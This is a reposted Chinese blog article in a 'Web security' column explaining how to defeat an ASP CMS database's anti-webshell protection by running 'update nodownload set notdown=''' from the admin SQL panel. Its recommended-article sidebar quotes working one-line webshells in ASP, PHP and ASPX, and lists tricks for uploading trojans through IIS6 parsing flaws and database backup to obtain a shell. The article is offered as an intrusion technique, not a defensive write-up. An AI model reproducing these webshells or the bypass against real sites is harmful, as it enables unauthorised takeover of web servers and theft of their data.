只需要一句即可突破防下载数据库

最新推荐文章于 2024-03-04 23:00:29 发布
最新推荐文章于 2024-03-04 23:00:29 发布
阅读量967 收藏
点赞数
分类专栏: Web安全

动吧明生KISS
转载请注明:http://www.abcxd.com


操作环境:马克斯版本,因为他的数据库是有防写入一句话马的,和动网等一切的防数据库下载的程序都很差不多。。

而我这一个操作却是可以突破。并是用什么闭合。。闭合的话。我们前提条件是需要知道<%方向.而此次我们只需要知道他的表名(防下载表)即可以突破他的防写入一句话马..思路很简单。既然我一开始未知他的闭合数。那么我们只需要将他的此表清空即可。哈哈这时很多人都会想到了吧。。好了现在开始实践一下操作。。

打开马克斯的后台-SQL高级管理

在原始打开数据库的时候会提示:

Active Server Pages 错误 'ASP 0116'

缺少关闭脚本分隔符

/inc/datas.asp,行83

Script 块缺少脚本关闭标记 (% >) 。

此时只需要输入一句就可以解决:

update nodownload set notdown=''

清空了。没有了任何的值。他又怎么防注入呢。。现在我们再打开一下他的数据库看看。。
是不是完全突破了呢。。。本人不喜欢叨唠。。。所以就这么短~

一些比较大的站点都有防注入。而表名和字段大多一样~所以这一句能解决不少问题   

不能删除此表。因为当你删除此表数据库一样会存在<%.可能这就是access数据库的问题所在.

kendyhj9999
关注
专栏目录
程序员突破年薪50万的唯一门坎-文档写作能力(一)
lifetragedy的专栏
02-01 2157
第一篇算是一个导论 不知道大家有没有经常回溯、追溯或者抱怨过这样的内容。 第一种抱怨:工作了4年、5年,晋升不明显,最最多做到一个小Team Leader,管了3-5个人。跳来跳去工资增涨只不过多个2千、3千。而眼看着快有希望一年突破50万时,已经35,36了。然后一旦公司有一个什么风吹草动,就等着被优化了。天天受到这样的心灵“煎熬”。 第二种抱怨:天天我们PM、我们老大要我们写文档,文档我是写了,可是我不是作协的啊,我交付的是代码不就可以了,写这种东西有什么用呢?要看文档?不如去看代码。 第三种抱
[原创]如何突破数据库Loop下载实例 邪恶八进制信息安全团队官方讨论组 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.mht
08-22
[原创]如何突破数据库Loop下载实例 邪恶八进制信息安全团队官方讨论组 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.mht
突破数据库下载的简单几招
kendyhj9999的专栏
01-27 2100
突破数据库下载的简单几招 http://hi.baidu.com/ycosxhack/item/1873fac1032bcfb90d0a7bb4 在几次实战入侵中,虽然发现了注入点,但是有时候想猜解管理员帐号、密码之类的信息会很棘手!如果知道了网站默认数据库地址或也许能通过注入点列目录查看服务器上的文件信息或暴库得到数据库地址……不管何种方法,要是能将数据库下载下来,那么
可以突破Script 缺少脚本关闭标记一句
weixin_30333885的博客
10-25 174
asp一句话 <%execute(request("SB"))%> "%><%execute(request("SB"))%><%' php一句话 <?php eval($_POST[SB]);?> aspx一句话 <% @Page Language="Jscript"%><%eval(Request.Item["SB"...
数据库下载之nodown字段插入方法
woshiqq的专栏
10-20 795
注:本文已发于《电脑报》,转载请注明。本文原址:刺猬的颓废空间. 一般网站的核心就是数据库,如果其被Down了,那么这个网站也就岌岌可危了!对于数据库下载处理,通常都是将其格式由“MDB”改为“ASP”或“ASA”等一些扩展名,并在其中加入一个下载字段,这个字段是如何加入的呢?  首先用Access打开MDB数据库,切换“对象”中的“表”为“查询”,然后双击“在设计视图中创建查询”,
mysql数据库随机生成数据库_MySQL 从零开始:08 番外:随机生成数据库数据
weixin_30601893的博客
01-19 2357
学习数据库时,难免需要一些数据进行实验,对于小数据量的数据来说,我们自己想一些数据并插入到数据库即可,但是如果需要大量的数据时,手动输入将是一项繁琐的工作,我们也不一定能编那么多数据。基于以上,自动生成数据库数据成为了一项很重要的需求。通过在网上搜集资料,我选择了几款可以自动生成大量随机数据库数据的工具。1、网页版:GeneratedataGeneratedata是一个免费、开放源码的脚本,主要由...
数据库期末整理
最新发布
m0_64462731的博客
03-04 940
6. --- 触发器包含所要触发的SQL语句:这里的语句可以是任何合法的语句, 包括复合语句,但是这里的语句受的限制和函数的一样。外模式:也称子模式或用户模式,他是数据库用户能够看到和使用的局部数据的逻辑结构和特征的描述,是数据库用户的数据视图,是与某一应用有关的数据的逻辑表示。外模式,亦称子模式或用户模式,是数据库用户(包括应用程序员和最终用户)能够看见和使用的局部数据的逻辑结构和特征的描述,是数据库用户的数据视图,是与某一应用有关的数据的逻辑表示。模式描述的是数据的全局逻辑结构。
数据库选型粗略对比,欢迎补充!!!
qq_39904855的博客
07-22 3547
MySQL是一个关系型数据库管理系统,由瑞典MySQLAB公司开发,目前属于Oracle公司。MySQL是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。MySQL是开源的,目前隶属于Oracle旗下产品。MySQL支持大型的数据库。可以处理拥有上千万条记录的大型数据库。MySQL使用标准的SQL数据语言形式。MySQL可以运行于多个系统上,并且支持多种语言。...
在n个城市建设通信网络,只需架设n-1条线路即可至少包含10个城市,城市数n由键盘录入,城市坐标由随机函数产生小于100的整数
04-23
在n个城市建设通信网络,只需架设n-1条线路即可。设计算法,求出如果以最低的经济代价建设这个通信网络。要求如下: (1)至少包含10个城市; (2)城市数n由键盘录入; (3)城市坐标由随机函数产生小于100的整数; 输出生成树中各条边以及它们的权值
数据结构实验报告
12-25
若要在n个城市之间建立通信网络,只需要假设n-1条线路即可。如何以最低的经济代价建设这个通信网络,这是一个网的最小生成树问题。 (1) 利用克鲁斯卡尔算法求网的最小生成树。 (2) 实现抽象数据类型的定义。
中国石油大学(北京) 远程教育学院 《数据结构》课程设计报告
05-06
题目要求:建立通信网络 在n个城市建设通信网络,只需架设n-1条线路即可。设计算法,求出如果以最低的经济代价建设这个通信网络。要求如下: (1)至少包含10个城市; (2)城市数n由键盘录入; (3)城市坐标由随机函数产生小于100的整数; (4)输出生成树中各条边以及它们的权值
华东理工继续教育学院计算机科学与技术专业,毕业班(一系列课程设计实验)
10-12
网络综合实验,系统软件课程设计,应用软件课程设计,硬件实验很简单,所以没有上传,请大家给支持明神品牌。都是我辛苦整理的,希望大家给点资源分。
最小生成树问题 要在n个城市之间建役通信网络
05-09
一、问题描述 若要在n个城市之间建役通信网络,只福要架设n-1条级路即可.如何以最低的经济代价建设这个通信网,是一个网的最小生成树问题。 二、基本要求 (1)利用克鲁斯卡尔算法求图的最小生成树。 (2)能实现教科书6.5节中定义的抽象数据类型MFSet.以此表示构造生成树过程中的连通分量。 (3 ) 以文本形式输出生成树中各条边以及他们的权值. 三、需求分析 1、构造图结构。 2、利用克鲁斯卡尔算法求图的最小生成树。 3、完成生成树的输出。
一句话木马拿Shell与菜刀原理
悦分享
07-12 1558
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
手工注入,后台另类拿webshell搞定影院系统
caiguazheng4921的博客
04-19 644
作者:rabbitsafe 大家好,我是rabbitsafe,这是本人开始研究asp程序发现的第一个漏洞,就是一个注入漏洞,但是只能用手工注入,工具检测不了的.我花了三天想出了从注入到后台拿webshell,因为后台拿webshell这种方法网上还没有,反正我是没看见过,应该算是原创,方法比较另类,大家往下看就知道了,开始讲入正题.今天我要检测的是一个影院系统,好像叫蚂蚁影...
Script不能放在另一个Script 内的解决办法
anjichan4261的博客
12-14 187
<script language="JavaScript">function changejs(n){var str;str = '<script language="JavaScript" type="text/javascript" src="inc/listnews.asp?page_no=';str = str + n;str = str + '"&gt...
H2数据库新手指南:从下载到创建表详解
H2数据库教程是针对新手的一门实用指南,它介绍了如何下载、安装和使用这款流行的轻量级数据库。H2数据库作为一种开源的选择,特别适合嵌入式应用,因为它无需独立的客户端和服务器,且完全基于Java开发,具有跨平台...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值